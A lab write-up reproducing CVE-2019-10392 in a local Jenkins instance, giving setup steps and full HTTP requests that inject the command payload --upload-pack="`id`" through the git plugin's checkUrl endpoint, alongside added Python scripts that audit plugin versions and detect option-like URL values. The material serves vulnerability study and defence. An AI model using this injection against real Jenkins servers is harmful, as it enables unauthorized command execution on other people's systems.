CVE-2019-10392 Jenkins 2k19 authenticated remote RCE
A Jenkins instance was started locally with Docker using the following command:
docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:lts-alpine
Version: Jenkins 2.176.3
git-client plugin: http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi
git plugin: http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi
Because the official plugin versions have already been upgraded (git-client to 2.8.5, git to 3.12.1), the older plugins have to be uploaded manually. After upload it looks as follows.
Create a new user named user.
Configure permissions for the account. The original author does not appear to have granted the Create permission; if you want to use an ordinary account to create a job for testing, you need to grant Create. Alternatively, operating on an already existing job also works and does not require Create. Here Create is granted for testing.
Log in as user; the user interface looks like this.
Select as follows.
Under SCM, select git and run.
Looking at the git-ls-remote documentation, note the --upload-pack= option among the listed parameters:
https://git-scm.com/docs/git-ls-remote.html
The meaning of this parameter is: specify the full path of git-upload-pack on the remote host. This allows listing references in repositories accessed over SSH in cases where the SSH daemon does not use the user's configured PATH.
So, execute --upload-pack="`id`"
The command can be seen to have executed.
As for the request used for testing, it differs slightly from the original author's form, and it is not yet clear why, but the following method works. The request is shown below, where test2 is the job name; first obtain the Jenkins-Crumb:
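For defenders, the practical question raised by the plugin versions above is whether an instance still runs a git-client release below 2.8.5 or a git plugin release below 3.12.1. The following Python script is an added example, not code from the write-up or from the Jenkins project; it compares installed plugin versions against those fixed versions. It assumes the installed-plugin data has the shape returned by Jenkins' /pluginManager/api/json?depth=1 endpoint (a "plugins" list with "shortName" and "version" keys); the sample input is constructed to mirror the versions used in the write-up.

```python
"""Audit Jenkins plugin versions against the fixed releases named in the write-up
for CVE-2019-10392 (git-client 2.8.5, git 3.12.1)."""
import json
import re

# Fixed versions stated in the write-up.
FIXED_VERSIONS = {
    "git-client": "2.8.5",
    "git": "3.12.1",
}


def parse_version(version):
    """Split a dotted plugin version into a tuple of ints so it compares numerically.

    Parsing stops at the first non-numeric component, so '3.12.1-beta' -> (3, 12, 1).
    """
    parts = []
    for piece in re.split(r"[.\-]", version):
        if piece.isdigit():
            parts.append(int(piece))
        else:
            break
    return tuple(parts)


def is_vulnerable(short_name, version):
    """True when the plugin is one of the two affected plugins and is below its fix."""
    fixed = FIXED_VERSIONS.get(short_name)
    if fixed is None:
        return False
    return parse_version(version) < parse_version(fixed)


def audit_plugins(plugin_json):
    """Return (shortName, installed, fixed) for every affected plugin below its fix.

    plugin_json is assumed to be the dict from /pluginManager/api/json?depth=1,
    i.e. {"plugins": [{"shortName": ..., "version": ...}, ...]}.
    """
    findings = []
    for plugin in plugin_json.get("plugins", []):
        name = plugin.get("shortName")
        installed = plugin.get("version", "")
        if is_vulnerable(name, installed):
            findings.append((name, installed, FIXED_VERSIONS[name]))
    return findings


# Constructed sample mirroring the plugin versions installed in the write-up.
SAMPLE = json.loads("""
{"plugins": [
  {"shortName": "git-client", "version": "2.8.2"},
  {"shortName": "git", "version": "3.12.0"},
  {"shortName": "workflow-aggregator", "version": "2.6"}
]}
""")

if __name__ == "__main__":
    for name, installed, fixed in audit_plugins(SAMPLE):
        print(f"{name} {installed} is below fixed version {fixed}: update required")
```

Against a live instance, the same function can be fed the JSON fetched from the plugin manager API by an account with read access.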
GET /job/test2/configure HTTP/1.1
Host: 192.168.253.139:8080
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.253.139:8080/job/test2/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: screenResolution=1536x864; JSESSIONID.b4706a48=node013tshj9ds2r3kr18mgmyaquc114.node0; JSESSIONID.83272e09=node0dt5602fpgb3a108885vr3228h9.node0
Connection: close
Then carry the obtained "Jenkins-Crumb" in the request:
POST /job/test2/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl HTTP/1.1
Host: 192.168.253.139:8080
Content-Length: 51
Origin: http://192.168.253.139:8080
Jenkins-Crumb: b2ecec81285edce6716900a2d4e1b687
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
DNT: 1
Referer: http://192.168.253.139:8080/job/test2/configure
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: screenResolution=1536x864; JSESSIONID.b4706a48=node013tshj9ds2r3kr18mgmyaquc114.node0; JSESSIONID.83272e09=node0dt5602fpgb3a108885vr3228h9.node0
Connection: close
value=--upload-pack%3D%22%60id%60%22&credentialsId=
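The root of the issue visible in the request above is that the value of the repository URL field is passed to git ls-remote as an argument, so a value beginning with "-" is interpreted as an option rather than a URL. The following Python script is an added detection example, not code from the write-up or from the Jenkins project: it inspects form submissions to the checkUrl endpoint and flags fields whose decoded value looks like a git option. The sample requests are constructed; the first reuses the request line and body from the write-up, the second is a benign URL for comparison.

```python
"""Flag submissions to the git UserRemoteConfig checkUrl endpoint whose
repository URL field decodes to something that starts with '-' (a git option)."""
from urllib.parse import parse_qs, urlparse

# Path suffix of the endpoint from the write-up's request.
CHECKURL_SUFFIX = "/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl"


def is_option_like(value):
    """A remote 'URL' beginning with '-' would be consumed by git ls-remote as an option."""
    return value.lstrip().startswith("-")


def inspect_request(method, path, body):
    """Return (field, decoded_value) pairs that look like injected git options.

    Only POST requests to the checkUrl endpoint are examined; everything else
    returns an empty list.
    """
    if method != "POST" or not urlparse(path).path.endswith(CHECKURL_SUFFIX):
        return []
    hits = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if is_option_like(value):
                hits.append((field, value))
    return hits


# Constructed samples: (method, path, body).
SAMPLES = [
    ("POST", "/job/test2/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl",
     "value=--upload-pack%3D%22%60id%60%22&credentialsId="),
    ("POST", "/job/test2/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl",
     "value=https%3A%2F%2Fgithub.com%2Fexample%2Frepo.git&credentialsId="),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        hits = inspect_request(method, path, body)
        status = "SUSPICIOUS" if hits else "ok"
        print(f"{status}: {method} {path} {hits}")
```

The same check can be placed in front of Jenkins as a reverse-proxy or WAF rule; note that the payload is URL-encoded in transit, so matching must happen on the decoded form value, not on the raw body.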